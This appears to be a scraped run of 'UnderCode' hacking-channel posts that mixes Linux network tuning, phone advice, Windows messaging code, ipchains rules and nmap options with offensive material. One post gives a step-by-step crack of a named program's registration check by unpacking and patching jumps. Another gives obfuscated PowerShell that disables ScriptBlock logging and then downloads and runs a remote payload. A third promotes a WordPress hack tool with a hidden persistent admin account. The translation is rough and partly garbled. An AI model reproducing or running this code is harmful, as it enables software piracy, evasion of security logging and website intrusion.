▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑speedup linux net tips- Kernel network parameters
T.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

for each network interface Through the kernel network parameters for each network interface, you can specify the response kernel network parameters for specific network interfaces such as eth0, eth1, and so on. Note: The parameters under / proc / sys / net / ipv4 / conf / all / will apply to all network interfaces.

1) accept_redirects: This parameter is located in / proc / sys / net / ipv4 / conf / DEV / accept_redirects (DEV stands for the specific network interface). If your host has two routers in the network segment, you can set one of them Becomes the default gateway, but when the gateway receives your ip packet and finds that the ip packet must pass through another router, the router will then send you a so-called "redirect" icmp packet to tell the ip packet Forward to another router. The parameter value is Boolean, 1 means to receive such redirected icmp information, 0 means to ignore. The default value is 0 on the Linux host acting as the router, and the default value is 1 on the general Linux host. It is recommended to change it to 0 or use "Security Redirection" (see below) to eliminate security risks.

2) log_martians: logs IP packets containing illegal address information to the kernel log. The parameter value is a Boolean value.

Applications:

We talked about the rp_filter reverse path filtering parameter. At the same time, we can execute the following statement

echo "1"> / proc / sys / net / ipv4 / conf / all / log_martians



and then record the ip spoofed ip packets to var / log / messages.

3) forwarding: enable the IP forwarding function of the specific network interface. The parameter value is a Boolean value, and 1 means logging.

Application example:

echo "1"> / proc / sys / net / ipv4 / conf / eth0 / forwarding



4) accept_source_route: Whether to accept IP packets containing source routing information. The parameter value is Boolean, 1 means accept, 0 means not accept. The default value is 1 on the Linux host acting as the gateway, and 0 on the general Linux host. From a security perspective, we recommend that you turn off this feature.

5) secure_redirects: We have already mentioned the concept of "secure redirects". In fact, the so-called "secure redirects" only accept "redirect" icmp packets from the gateway. This parameter is used to set the "safe redirect" function. The parameter value is a Boolean value, 1 means enabled, 0 means disabled, and the default value is enabled.

6) proxy_arp: Set whether to relay arp packets on the network. The parameter value is Boolean, 1 means relay, 0 means ignore, and the default value is 0. This parameter is usually only useful for linux hosts acting as routers.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
t.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) cleaning up RAM
What is RAM? You can imagine that RAM is a temporary storage space. The more apps you open and the heavier a single app, the larger the RAM space occupied. When the RAM is full, the phone will become very stuttered. (That is, it doesn't make sense to have as much space before the RAM is full).

2) cleaning up the cache
The so-called cache is that the app temporarily stores some content in your phone space so that you do n’t need to download it again the next time you read it; for example, photos from the LINE group, some photos you have already seen, you need to re-read When you see it, just click it to open it; but if it is a photo you have n’t seen, you have to wait for it to be downloaded before you can see it.

3) hard disk space
Needless to say hard disk space? It is the capacity of iPhone / Android phones. Although GB is the same as RAM, most mobile phones do not support virtual memory, which means that the space not used by your hard disk is not allocated to RAM.

4) Clean up mobile trash, the difference is in capacity
Imagine that your mobile phone is a car. Cleaning up mobile phone trash is like removing garbage and dust from the car; it will increase the capacity, but it does not affect the speed. The reason for the real speed is RAM and the processor.

🦑Tips :

If you still feel that your phone is stuck, it may not be the cause of "junk", but the app you use will become more and more resourceful with time updates.

After all, software developers always want more and more functions, so software is becoming more and more efficient.

So, I really feel that the mobile phone is very stuck. Perhaps the most direct and cruel solution is ... it's time to change a mobile phone; clean up the trash and regain the phone? I'm afraid it's difficult.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑from today-posted one :

> Speed optimization-enable hard disk DMA support

> good BIN WWE NETWORT

>Speed optimization-read and write on memory

> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?

> cvs service-ViewCVS install Howto full by undercode

> LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance

> speedup net linux speed- IP related kernel configuration parameters The

> speedup linux net tips- Kernel network parameters

> tested 5xGeforce Nvidia Bins

> The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)

@UnderCodeTesting - e n j o y

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Window, thread, superclass, subclass Full by Undercode
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Windows and messages for Windows are discussed for completeness of the narrative, and processes and threads are briefly discussed. Subclassing and Superclassing are two methods of reusing code that accompany the Windows window mechanism. Don't confuse "subclassing, superclassing" with derived and base classes in object-oriented languages. The "class" in "subclassing and superclassing" refers to the window class of Windows.

2) The system establishes a message queue for a windowed thread. A thread with a message queue can receive messages. For example, we can use the PostThreadMessage function to send messages to threads.

As long as a windowless thread calls PeekMessage or GetMessage, the system will also create a message queue for it.

🦑 Windows and messages
1) Message queue for threads
Each running program is a process. Each process has one or more threads. Some threads have no windows, and some threads have one or more windows.

We can send messages to threads, but most messages are sent to windows. Messages sent to the window are also placed in the thread's message queue. We can think of the thread's message queue as a mailbox and the window as a recipient. When we send a message to a specified window, the system will find the thread to which the window belongs, and then put the message in the thread's message queue.

Thread message queue is a data structure inside the system, we can't see this structure in the program. But we can send and deliver messages to the message queue through the Windows API; receive messages from the message queue; transform and dispatch the received messages.

2) The smallest Windows program
Windows programmers have probably seen such a minimal Windows program:

// Example 1

#include "windows.h"

static const char m_szName [] = "window";

If the main window callback function directly uses DefWindowProc, the message loop will not end when the window is closed

static LRESULT CALLBACK WindowProc (HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)

{

switch (uMsg)

{

case WM_DESTROY: PostQuitMessage (0); // End the message loop by sending a WM_QUIT message when the window is closed

break;

default: return DefWindowProc (hWnd, uMsg, wParam, lParam);

}

return 0;

}
main function

int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)

{

WNDCLASS wc;

memset (& wc, 0, sizeof (WNDCLASS));

wc.style = CS_VREDRAW | CS_HREDRAW;

wc.lpfnWndProc = (WNDPROC) WindowProc;

wc.hCursor = LoadCursor (NULL, IDC_ARROW);

wc.hbrBackground = (HBRUSH) (COLOR_WINDOW);

wc.lpszClassName = m_szName;

RegisterClass (& wc); // Register window class

HWND hWnd;

hWnd = CreateWindow (m_szName, m_szName, WS_OVERLAPPEDWINDOW, 100,100,320,240, NULL, NULL, hInstance, NULL); // Create window

ShowWindow (hWnd, nCmdShow); // show window

MSG sMsg;

while (int ret = GetMessage (& sMsg, NULL, 0, 0))

{

// message loop

if (ret! = -1)

{

TranslateMessage (& sMsg);

DispatchMessage (& sMsg);

}

}

return 0;

}



3) Although this program only displays a window, it is often used to explain the basic structure of Windows programs. We can also find a similar program structure inside the MFC framework. This app contains the following basic concepts:

Window class, the window procedure and a window message loop
following were introduced.

4) Window Classes, Windows, and Window Procedures
When creating a window, provide the name of the window class. A window class is equivalent to a window template. We can create multiple windows based on the same window class . We can use the windows class registered in Windows in advance. But in more cases, we want to register our own window class . When registering window classes, we need to register items such as name, style, icon, cursor, menu, etc. The most important of these is the address of the window procedure.
5) The window procedure is a function.

All messages received by the window will be sent to this function for processing. So, how is the message sent to the thread message queue sent to the window?

6) Message loop programmers familiar with embedded multitasking programs know that the structure of tasks (equivalent to Windows threads) is basically:

while (1) {wait for signal; process signal;} The task receives the signal and processes it, otherwise it hangs and lets other tasks run. This is the basic structure of a message driver. Windows programs usually do the same:

while (int ret = GetMessage (& sMsg, NULL, 0, 0)) {// message loop if (ret! = -1) {TranslateMessage (& sMsg); DispatchMessage (& sMsg);}}

GetMessage receives a message from a message queue; TranslateMessage generates a WM_CHAR message according to the key press and puts it into the message queue ; DispatchMessage dispatches the message to the window according to the window handle in the message, that is, calls the window procedure function to process the message .

7) Communicating by Message
The function that creates a window returns a window handle. The window handle identifies a unique window instance system-wide (not process-wide). By sending messages to the window, we can achieve in-process and inter-process communication.

We can use SendMessage or PostMessage to send or post messages to the window. SendMessage must wait until the target window has processed the message before returning. I tried: If SendMessage is sent to a window without a message loop, the SendMessage function will never return. PostMessage returns immediately after putting the message in the thread's message queue.

In fact, only delivered messages are dispatched to the window procedure via DispatchMessage. The message sent via SendMessage is already dispatched to the window procedure when the thread GetMessage, without going through DispatchMessage.

🦑 Example of communication between window program and console program Do
you think "routine 1" is meaningless? Let's use it to make a small game: let "routine 1" make a close contact with a console program. We first modify the window procedure of "Routine 1" to:

static LRESULT CALLBACK WindowProc (HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)

{

static DWORD tid = 0;

switch (uMsg)

{

case WM_DESTROY:

PostQuitMessage (0); // End the message loop by sending a WM_QUIT message when the window is closed

break;

case WM_USER:

tid = wParam; // Save the thread ID of the console program

SetWindowText (hWnd, "Received");

break;

case WM_CHAR:

if (tid)

{

switch (wParam)

{

case '1': PostThreadMessage (tid, WM_USER + 1, 0, 0); // Send a message to the console program 1

break;

case '2': PostThreadMessage (tid, WM_USER + 2, 0, 0); // Send a message to the console program 2

break;

}

}

break;

default:

return DefWindowProc (hWnd, uMsg, wParam, lParam);

}

return 0;

} Then, we create a console program with the following code:

#include "windows.h

"#include" stdio.h "

static HWND m_hWnd = 0;

void process_msg (UINT msg, WPARAM wp, LPARAM lp)

{

char buf [100];

static int i = 1;

if (! m_hWnd)

{return;}

switch (msg)

{

case WM_USER + 1:

SendMessage (m_hWnd, WM_GETTEXT, sizeof (buf), (LPARAM) buf);

printf ("You are now called:% s \ n \ n", buf); // read and display the name of the other party

break;

case WM_USER + 2:

sprintf (buf, "I am a window% d", i ++);

SendMessage (m_hWnd, WM_SETTEXT, sizeof (buf), (LPARAM) buf); // modify the name of the other party

printf ("renamed you \ n \ n");

break;

}

}



int main ()

{

MSG sMsg;

printf ("Start with thread id% d \ n", GetCurrentThreadId ());

m_hWnd = FindWindow (NULL, "window");

if (m_hWnd)

{

printf ("Found window% x \ n \ n", m_hWnd);

SendMessage (m_hWnd, WM_USER, GetCurrentThreadId (), 0);

}

else

{

printf ("No window found \ n \ n");

}

while (int ret = GetMessage (& sMsg, NULL, 0, 0))

{

// message loop

if (ret! = -1)
{

process_msg (sMsg.

message, sMsg.wParam, sMsg.lParam);

}

}

return 0;

}

7) Can everyone understand how to play this game? Run "routine 1" wnd first, then run the console program msg. msg will find the window of wnd and send its main thread ID to wnd. After receiving the msg message, wnd will display it. At this point, wnd and msg have established communication channels: wnd can send messages to msg's main thread, and msg can send messages to wnd's window.

8) If we press the key '1' in the wnd window, wnd will send message 1 to msg. After receiving msg, we will get the window name of wnd and display it through WM_GETTEXT message. If we press the key '2' in the wnd window, wnd will send message 2 to msg. After receiving msg, we will modify the window name of wnd through the WM_SETTEXT message.

9) This small example demonstrates the message loop of a console program, sending messages to threads, and communicating messages between processes.

10) The problem of address space
Different processes have independent address spaces. If we include the address of a process A in the message parameters, then send it to process B. If process B operates on this address in its own address space, an error will occur. So why does WM_GETTEXT and WM_SETEXT in the above example work properly?

This is because WM_GETTEXT and WM_SETEXT are messages defined by Windows itself. Windows knows the meaning of the parameters and does special processing, that is, allocate a block of memory in the space of process B as a relay, and in the buffer of process A and process B Copy data from time to time. For example: In the example in Section 1.5.1, if we set a breakpoint to observe, we will find that lParam in the WM_SETTEXT message sent by msg is not equal to lParam in the WM_SETTEXT message received by wnd.

11) If we pass the memory address in the message defined by ourselves, the system will not do any special processing, so an error must occur.

Windows provides a WM_COPYDATA message to pass data to the window, and Windows also does special processing for this message.

12) When sending messages between processes that require additional memory allocation, we should use SendMessage instead of PostMessage. Because SendMessage will wait for the receiver to finish processing before returning, so the system will have the opportunity to release the allocated memory. If PostMessage is used in this case, the system will ignore the message that needs to be delivered. The reader can experiment with it in the msg program.

🦑 Subclassing and superclassing A
window class is a template for a window, and a window is an instance of a window class. Window class and

temporarily)

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 how to crack the software registration code full by UnderCode :
twitter.com/undercodeNews :

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

for who have never been exposed to software cracking or programming.
> Let ’s start today ’s crack,

> The software I want to crack: The software needed for the network form terminator to

1) shell language.exe

2) shelling AspackDie.exe

3) decompile W32Dasm gold - version
hex editor UltraEdit.rar

🦑 Review the basics before cracking:
I. Cracked Level

> Beginner, modify the program, modify the exe file with ultraedit, called brute force cracking, referred to as blasting
intermediate,@ undercodeTesting chase the registration code of the software
advanced, write the registration machine

🦑 General steps for cracking with w32dasm:

1) Look at the software manual, what is the difference between software registration and non-registration, and how to register

2) Run this software, try to enter your name and any registration code to register, what are the error messages, and the error messages Write it down

3) Detect if there is shelling .

4) pw32dasmgold disassembly

5) Find the error message or the correct message may be correct mouse button

6) pw32dasmgold main window corresponding assembler analysis, to identify the key and key jump Call

7) the green light of the stop key in the jump, jump to find the key offset address at the bottom of the main window pw32dasmgold (actually modify the address)

8) Using ultraedit to find the offset address (actually modify the address) modify the machine code and save

🦑 The concept of the shell: copyright information needs to be protected, do not want others to change it, exe executable file compression, the most common shell software ASPACK, UPX, PEcompact

> Unpacking: Get a software to detect its shell, and then we need to unpack its shell to restore its original appearance. If it is not packed, it will not be necessary to unpack it. Unpacking software unaspack, caspr, upx, unpecompact, procdump

> Actually modify address (offset address) and the row address (virtual address) pw32dasmgold out disassembly code consists of three columns
of the first column of the row address (virtual address)

> in the second column machine code (modified in the final modified ultraedit)
the third column Assembly instruction

1) First column Second column Third column
: 0041BE38 2B45F0 sub eax, dword ptr [ebp-10]
: 0041BE3B 6A42 push 00000042
: 0041BE3D 50 push eax
: 0041BE3E FF75F4 push [ebp-0C]
: 0041BE41 FF75F0 push [ebp-10]
: 0041BE44 FF35A8AB4400 push dword ptr [0044ABA8]


2) Different modification methods
for two different situations :

a) Modify to jmp
je (jne, jz, jnz) => jmp corresponding machine code EB (the first jump found in the error message upward) jmp's role is to jump absolutely and unconditionally To skip the error message below

b) Modify to nop
je (jne, jz, jnz) => nop corresponding machine code 90 (the first jump found with the correct information upward) The role of nop is to erase this jump, make this jump invalid, and lose Function, so that the program smoothly comes to the correct information immediately following it.

🦑 Alright, let's start our cracking journey. . . . . . . . . .

1) Investigate the shell: First open the language.exe of the detect shell, and select Open ---- find the network fill-in terminator to be cracked: FormGhost.exe, click OK, as shown in Figure 1. language.exe shows that the software shell is: Aspack

2) Unpacking: Double-click the unpacked AspackDie.exe, a dialog box appears, select the network form filling terminator: FormGhost.exe, and open

3) Terminate the form in the network: FormGhost.exe generates an unpacked.exe file in the same directory. This is the unpacked FormGhost.exe.

4) start disassembly: open the decompile W32Dasm Gold-official version is chineese version, select disassembly-open the unpacked.exe after unpacking, and start to load

5) start to modify the software: open the hexadecimal editor UltraEdit.

rar, (a bit slow)

>Open unpacked.exe after unpacking, directly press ctrl + g, a dialog box appears, enter 0xacb4b (that is, the offset address, not the preceding 000)

6)close all software, run the unpacked222.exe saved, click help --- registration, registration name, registration code to add casually, click OK, and prompt registration completion. Figure 21. Go back to the software interface and look at the help. The registration item has been grayed out

🦑 The cracking is all completed

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PowerShell ScriptBlock Log Bypass by underCode :
twitter.com/undercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) As with any logging service, ScriptBlock logging is controlled using Group Policy settings. PowerShell queries it every time it detects a new ScriptBlock to determine if it needs to be registered. But the fact is that PowerShell executes the request once, caches it in memory and returns it every time it is accessed.

2) Thus, these parameters can be easily changed using the following code.

$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)

$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] =

$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

3) These actions can be performed without administrator privileges and without touching the registry, which allows us to do this discreetly. But there is one limitation.

4) New policies are applied after checking the parameters that will be viewed when the first ScriptBlock is completed, which will lead to the registration of the event. Therefore, this trigger ScriptBlock should be as obfuscated as possible and should not carry any payload. That is, it is performed specifically to complete logging.

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")


5) The above script executes a trigger for the log, checks the logging parameters and launches the payload bypassing logging.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑you can /upload this scripts to git repo and start some helpful script, with few customization

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The Latin, this script automatically install any package for pentest with uptodate tools , and lazy command for run the tools like lazynmap , install another and update to new #actually for lazy people hahaha #and Lalin is remake the lazykali with fixed bugs , added new features and uptodate tools . It's compatible with the latest release of Kali
pinterest.com/undercodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/Screetsec/LALIN

2) cd LATIN

3) $ sudo chmod +x Lalin.sh

4) $ sudo ./Lalin.sh

🦑Tested by UnderCode

> kali, on GNOME desk

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated 2020 generate and search pattern string for exploit development
twitter.com/unDERCODENews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/Svenito/exploit-pattern

2) cd exploit-pattern

3) Generate a pattern

$> pattern.py 100
Aa0Aa0Aa1Aa1Aa2Aa2Aa3Aa3Aa4Aa4Aa5Aa5Aa6Aa6Aa7Aa7Aa8Aa8Aa9Aa9Ab0Ab0Ab1Ab1Ab2Ab2Ab3Ab3Ab4Ab4Ab5Ab5Ab6A

4) Search for a pattern
$> pattern.py Bf4B

5) Pattern Bf4 first occurrence at position 942 in pattern.
$> pattern.py 0x42346642
Pattern 0x42346642 first occurrence at position 942 in pattern.

6) Use it in your own python code
After placing pattern.py in the same directory as your script:

from pattern import pattern_gen

print(pattern_gen(10))
or

from pattern import pattern_search

found_at = pattern_search('Bf4B')

@underCodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New 2020 wordpress hack script for linux-termux :
T.me/UnderCodeTesting

>Features :

1) Bypass WAF(Web application firewall)

2) Hidden/Stealth

3) Let's you login to any user

4) Dump entire user entries

5) Create a persistent admin account that is hidden

6) Obfuscated implant

7) Multi-functionality

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/shadowlabscc/ProjectOpal.git

2)cd ProjectOpal

3) python opal.py

@underCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Popular instagram sites-Trials-Passwords not Required :
THOSE ARE MOST POPULAR BUT NOT TESTED BY UNDERCODE :
fb.com/underCodeTesting

> https://famoid.com/buy-instagram-followers/

> https://www.followerpackages.com/buy-instagram-followers/

> https://www.genuinelikes.com/buy-instagram-followers.php

> https://www.getrealboost.com/buy-real-instagram-followers/

> https://krootez.com/buy-real-instagram-followers/

> https://buyiglikesfast.com/

> https://cheapigfollowers.com/

> https://friendlylikes.com/

> https://brsm.io/buy-real-active-instagram-followers/


🦑 There is also 100000 sites But we choosed most popular services-
🦑If Site Trial not avaible-Try after few hours :)

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Enhance network security with SYN packet characteristics BY uNDERcODE :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Consider the following situation: the
internal network is 198.199.1.0, and Linux is used as a router and firewall to connect to the Internet. On the firewall, eth0 is connected to the external network and eth1 is connected to the internal network.

2) For the security of the www service, set the following set of ipchains rules:
ipchains -A input -p tcp -s 198.199.1.0/24: 1024 -d 0.0.0.0/0 www -i eth1 -j ACCEPT

3) ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT

4) In the above settings, only internal users are allowed to access www hosts on the Internet with ports above 1024 (undefined ports) In other words, allow a port greater than 1024 on the intranet host and port 80 on the Internet to establish a connection. Imagine that this would allow hosts on the Internet to use port 80 to connect to a port on your intranet host that is greater than 1024. From this we can see that the system has security risks because there are many services with service ports greater than 1024. So, how to overcome this hidden danger, we can use the characteristics of the SYN packet to eliminate this hidden danger.

5) First let's take a look at the flag bits in the TCP data segment header. TCP has six flags, which are: URG, ACK, PSH, RST, SYN, and FIN. Let's focus on the ACK, SYN and FIN flags.

6) ACK: indicates whether the confirmation number is legal, 1 indicates legality, 0 indicates that the confirmation number is invalid. The acknowledgment number refers to the next byte that is expected to be received instead of the previously received byte. It can be seen that the ACK of the packet that initiates the connection establishment request (that is, the first guarantee) is always set to 0, and the subsequent packets are always set to 1.

7) SYN: used to establish a connection. In the connection request, SYN = 1, and in the connection request confirmation, SYN = 1. Therefore, SYN stands for CONNECTION REQUEST and CONNECTION ACCEPTED. In subsequent TCP packets, SYN is always set to zero.
FIN: Used to cancel the connection.

8) The above can be summarized with the following table:

ACK flag SYN flag meaning of the TCP packet
0 1 connection request
1 1 connection request confirmation (accept connection request)
1 0 confirmation connection request confirmation
1 0 data packet
... ...

9) What we call a SYN packet is a connection request packet. As shown above, the SYN packet has the following characteristics: SYN = 1, ACK = 0, FIN = 0. Therefore, in order to filter connection request packets, it is only necessary to filter out SYN packets.

10) In ipchains, we can specify SYN packets like this:
-p tcp -s xxxx / x -y
If we can define all SYN packets from 192.168.1.0 like this:
-p tcp -s 192.168.1.0/24 -y
we can also Prefix -y with! To define all non-SYN packets:
-P tcp -s xxxx / x! -Y

🦑 So, in the above example, we can enhance the security of the network like this:

ipchains -A input -p tcp -s 198.199.1.0/24: 1024 -d 0.0.0.0/0 www -i eth1 -j ACCEPT
ipchains -A input -p tcp! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT

This will prevent hosts on the Internet from connecting to hosts on your intranet using port 80 A port greater than 1024, thereby achieving the purpose of enhancing network security.

References:
1) IPCHANIS-HOWTO
2)Internet firewall domain network security
3) Computer network

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Full UnderCdoe Tutorial: Nmap Network Security Scanner Instructions
PART 1

instagram.com/underCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

-i
Read data from the specified file instead of the command line. This file can store a list of hosts or networks, separated by spaces, TAB keys, or newlines. If you want to read from a standard input device (file)-for example, at the end of a pipe character, you need to use a hyphen (-) for the file name. You can find more information on writing this document in the target specifications.

The -p
parameter can specify the port you want to scan. For example, '-p 23' will only detect the port 23 of the host. The default scan is from 1 to 1024, or you can use the nmap A list of ports in the services file.

-F Quick scan mode. Specify that you want to scan only the ports in the port list listed in the services file provided in nmap. This is significantly faster than scanning all 65535 ports.

-D
This is a scan with deceptive mode. All the deceptive addresses you specify will be recorded in the remote host's connection record. In this case, their data storage will show that some port scans are initiated from an IP, but they cannot distinguish which is the real IP and which is used as a cover. This can defeat some of the behavior of tracking through routes, so It is a very practical technique to hide your IP. Separate each spoofed address with a comma. You can freely put 'me' in any place where you want to display the real IP. If you put 'ME' in the sixth place or even last, some port scan recorders (such as Solar Designer's excellent scanlogd) may not show your IP at all, if you don't use 'ME', nmap will place it randomly. Remember that the host you are using to scam must be open or you can scan your target half-open. Because it's fairly easy to tell which real intruder is from a bunch of IP addresses that are actually useless. You may also want to use the IP address instead of the name, so that the host's nameserver logs will not record you. Also remember that some (stupid) \ "port scan probes \" will refuse port scan attempts to the host. In this way, you will inadvertently cause the loss of the connection between the host you scanned and the "phishing host", which may bring a big problem-if the "phishing host" is an online gateway or even its local The machine will be disconnected as well! So you better use this parameter carefully-for moral reasons-it's just a scam, isn't it? This spoofing can be used in the initial ping scan (using ICMP, SYN, ACK or other) and the actual port status scan. It can also be used for remote OS identification (-O). Of course, if you write too many decoy addresses, it is useless, which can only slow down the scanning speed and reduce some accuracy. And some instruction processing systems may filter out your spoofed packets, although most (almost all) do not place any restrictions on spoofed packets.

-S
Under certain circumstances, nmap may not be able to determine your source address-in this case nmap will prompt, then you need to use -S with IP address to label. Another possibility is to trick the target into thinking that someone is scanning it. Imagine that a company finds constant scanning by competitors :), this is an unsupported usage, or rather, not the main purpose. I just use it to remind people not to blame when they find a port scanner. Maybe he is innocent. -e can explain the general usage of this parameter.

-e
tells nmap which interface to send or receive. nmap can detect it automatically, and if it can't, it will prompt you.